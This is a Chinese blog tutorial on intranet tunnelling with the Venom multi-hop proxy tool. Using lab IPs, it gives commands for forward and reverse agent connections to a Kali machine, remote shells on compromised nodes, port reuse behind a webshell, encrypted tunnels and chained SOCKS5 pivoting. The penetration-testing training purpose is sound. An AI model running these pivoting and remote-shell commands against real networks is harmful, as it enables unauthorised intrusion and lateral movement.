内网隧道——Venom(毒液)

于 2024-07-24 17:04:22 发布
阅读量608 收藏 6
点赞数 19
分类专栏: 内网渗透 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/140661373
版权

文章目录

一、Venom简介

Venom工具也被称为“毒液工具”,它是一款开源的多级代理工具,使用Go语言开发,支持多种平台。Venom可以将多个节点进行连接,并以节点为跳板构建多级代理搭建网络隧道,渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网管理代理节点,利用"毒液"进行可视化网络拓扑、多级Socks5代理、多级端口转发、端口复用(Apache、Mysql等服务)、SSH隧道、交互式Shell、文件的上传和下载、节点间通信加密等。

网络拓扑如下:
在这里插入图片描述
攻击机kali IP:192.168.111.0
跳板机win7 IP:192.168.111.128,192.168.52.143
靶机win server 2008 IP:192.168.52.138

二、基础使用

2.1 正向连接

应用场景:当拿下Web服务器权限后,通过探测发现Web服务器不出网,但能正常访问主机,可以使用venom工具以正向连接的方式搭建隧道进行渗透。
1、跳板机开启客户端监听。

agent.exe -lport 8888 # 监听8888端口

在这里插入图片描述
2、kali使用admin服务端发起连接。

./admin_linux_x64 -rhost 192.168.111.128 -rport 8888
# -rhost:指向远程连接ip
# -rport:指连接的端口

show # 显示网络拓扑
goto 1 # 选择结点1,也就是跳板机
shell # 获取结点1的shell

在这里插入图片描述

2.2 反向连接

1、kali本地监听8888端口;

./admin_linux_x64 -lport 8888

在这里插入图片描述
2、跳板机主动发起连接kali监听的8888端口,建立起隧道通讯。

agent.exe -rhost 192.168.111.0 -rport 8888

在这里插入图片描述
3、此时服务端会接收建立隧道信息,使用show命令可以显示网络拓扑。
在这里插入图片描述

2.3 端口复用

应用场景:假设上传webshell后,Web服务器只有80端口的开放http服务可以利用,下面我们通过venom工具的SO_REUSEPORTSO_REUSEADDR选项进行端口复用,Windows服务器下复用apache中间件的http服务80端口,不影响http服务正常使用。

1、上传 agent文件到Web服务器命令,设置80端口的复用。

agent.exe -lhost 192.168.111.128 -reuse-port 80

在这里插入图片描述
2、kali使用admin服务端执行下面的命令,来进行端口复用。

./admin_linux_x64 -rhost 192.168.111.128 -rport 80

在这里插入图片描述

2.4 加密通信(反向连接)

Venom工具支持隧道通信加密,对通讯数据进行加密保护,本地通过-passwd参数选项指定密码进行设置,密码用于生成AES加密所需的密钥。

1、kali使用venom工具服务端执行以下命令,为隧道进行加密。

./admin_linux_x64 -lport 8888 -passwd Admin123.

在这里插入图片描述

2、跳板机使用venom工具客户端agent文件,指定相同的密码与服务端admin连接,执行以下命令,成功即可达到隧道节点通讯加密的效果。

agent.exe -rhost 192.168.111.0 -rport 8888 -passwd Admin123.

在这里插入图片描述
3、kali与跳板机之间建立了加密隧道。
在这里插入图片描述

三、多层网络穿透

网络拓扑如下:
在这里插入图片描述

攻击机kali IP:192.168.111.0
跳板机1 win7 IP:192.168.111.128,192.168.52.143
跳板机2 win server 2008 IP:192.168.52.138,192.168.48.129
靶机win server 2003 IP:192.168.48.128

1、在跳板机上开启本地客户端监听,我们以正向连接的方式搭建隧道。

agent.exe -lport 8888

在这里插入图片描述
2、kali使用venom服务端进行正向连接,show查看连接情况,如果有A—1,证明客户端连接成功。

./admin_linux_x64 -rhost 192.168.111.128 -rport 8888
# -rhost:跳板机IP
# -rport:跳板机监听端口

在这里插入图片描述
3、在跳板机1与kali之间建立socks隧道。

goto 1
socks 4444

在这里插入图片描述
4、kali修改proxychains4.conf配置文件,并在其底部添加一行socks5 127.0.0.1 1024参数来完成proxychains代理配置。
在这里插入图片描述
5、当配置完proxychains代理后,即可在攻击机执行proxychains rdesktop 192.168.52.138命令来连接跳板机2,通过所建立的socks协议隧道,我们可以直接远程连接到跳板机2。
在这里插入图片描述
6、将agent.exe上传到跳板机2上,同时监听4444端口。

agent.exe -lport 4444

在这里插入图片描述
7、kali进入结点1(跳板机1),连接靶机

goto 1
connect 192.168.52.138 4444 # 靶机IP及监听的端口

在这里插入图片描述
在这里插入图片描述
8、在跳板机2与kali之间建立socks隧道。
在这里插入图片描述
在这里插入图片描述
8、通过socks5隧道,ping通靶机(192.168.48.128)。
在这里插入图片描述

PT_silver
关注
  • 19
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
毒液毒液-渗透测试仪的多跳代理
02-06
渗透测试人员可以使用毒液轻松地将网络流量代理到多层内网,并轻松地管理代理服务器。 此工具仅限于安全研究和教学,用户承担因使用此工具而导致所有法律和相关责任!作者不承担任何法律和相关责任! 特性 可视化...
毒液
02-18
"毒液"通常在IT行业中并不指代一种特定的技术或编程语言,而是更多地与娱乐产业,特别是漫画、电影和游戏中的角色相关。然而,由于提供的标签为空,我们无法直接关联到任何特定的IT主题。但我们可以从"毒液"这个名字...
内网渗透系列:内网隧道Venom
闵行小鱼塘
04-09 1362
本文研究端口转发&SOCKS5&SSH的一个工具,Venom
Venom 内网穿透
weixin_44617541的博客
04-17 4248
Venom 内网穿透
探索未来区块链的门户 —— Venom 知识库
最新发布
gitblog_00038的博客
06-19 416
探索未来区块链的门户 —— Venom 知识库 项目地址:https://gitcode.com/venom-blockchain/venom-blockchain.github.io 在快速演变的技术前沿,区块链以其去中心化的力量重塑着互联网的面貌。今天,我们向您隆重推荐——Venom知识库,这不仅是通往Venom区块链世界的钥匙,更是一个汇聚开发者智慧与创新的宝地。 项目介绍 Venom知识库...
内网代理神奇Venom
Fengxin的博客
11-05 529
Venom项目地址:https://github.com/Dliv3/Venom/releases 0x00 Venom介绍: Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具,可将多个节点进行连接,然后以节点为跳板,构建多级代理。 0x01 特性 可视化网络拓扑 多级socks5代理 多级端口转发 端口复用 (apache/mysql/...) ssh隧道 交互式shell 文件的上传和下载 支持多种平台(Linux/Windows/MacOS)和多种架构(x86/x64/arm/mip.
venom-master_venom_apiwhatsapp_
09-29
venom source code for whatsapp api
venom tweaks
04-17
毒液设置,大家可以在自己的手机上设置更多的东西,比如状态栏透明等等@!
Venom
03-12
毒液用户机器人 #include /** Your Telegram account may get banned. I am not responsible for any improper use of this bot This bot is intended for the purpose of having fun with memes, as well ...
venom-bot-for-whatsapp:Bot for Whatsapp用毒液制成
05-23
毒液制作的WhatsApp机器人 Simple example of a whasapp bot in Venom and Node.Js 如何开始项目 我 npm开始
Venom Guestbook-开源
05-15
Venom Guestbook 开源详解】 Venom Guestbook 是一款开源的在线留言簿软件,专为网站所有者设计,提供了一种与访问者互动、收集反馈的便捷方式。开源软件的特点在于其源代码对公众开放,允许用户自由查看、修改和...
机器人毒液
02-28
9. **持续集成和部署**:对于一个名为"robot.venom-main"的文件,这可能是项目的主入口点或配置文件。在开发过程中,持续集成(CI)和持续部署(CD)工具如Jenkins或GitHub Actions可能会被用来自动化构建、测试和...
php-venom-master
03-12
【标题】"php-venom-master" 指的可能是一个PHP项目,名为"php_venom"的主分支或版本。在编程领域,通常使用类似"master"的术语来标识项目的主线或主要版本。这可能是一个开源项目,或者一个用于特定功能或目的的PHP...
gs-venom-to-legend
03-20
二是编程中的一种框架、库或者工具,比如Web安全领域的Burp Suite的扩展——Venom。而 "legend" 可能是指传说、神话,也可能是一个游戏的版本或成就,它可能代表了这个项目在游戏世界中的地位或者目标。 在这个场景...
venomliff:毒液Liff应用程序
02-15
毒液Liff应用程序——JavaScript技术的创新应用】 在当今的移动互联网时代,应用程序的开发方式正在不断演变,其中Liff(Line Extension for In-Chat Apps)是Line公司推出的一种创新技术,它允许用户在Line聊天...
Venom Wallpaper for New Tab-crx插件
04-07
获取新标签的新毒液壁纸背景 看看我们新推出的令人惊叹的Venom Wallpapers HD扩展! 它是由粉丝和粉丝创建的。 如果您是其中的粉丝之一,那么您就不能只路过如此精彩的《毒液》电影。 我们关心您的舒适,因此我们...
Android代码-Venom
08-06
Venom Your preferred open source focused crawler for the Deep Web. Overview Our aim is to create a blazing fast, fully customizable and robust crawler that is simple and handy to use. Quick links ...
venom-源码.rar
10-10
venom-源码.rar】是一个压缩包文件,通常包含了一款名为"venom"的项目的源代码。源代码是程序开发的基础,它由程序员用编程语言编写,用于描述软件的功能、逻辑和实现方式。在深入探讨venom的源码之前,让我们先...
FileNotFoundError: [Errno 2] No such file or directory: '毒液:致命守护者 Venom-豆瓣短评.csv'
04-25
当使用`with open()`加载文件内容时,如果文件不存在,会出现`FileNotFoundError: [Errno 2] No such file or directory`的错误。解决这个问题的方法有多种。下面是两种常见的解决方法: 1. 使用`try-except`语句捕获异常[^1]: ```python try: with open('毒液:致命守护者 Venom-豆瓣短评.csv', 'r') as file: # 处理文件内容 except FileNotFoundError: print("文件不存在") ``` 2. 使用`os.path.exists()`函数检查文件是否存在: ```python import os file_path = '毒液:致命守护者 Venom-豆瓣短评.csv' if os.path.exists(file_path): with open(file_path, 'r') as file: # 处理文件内容 else: print("文件不存在") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值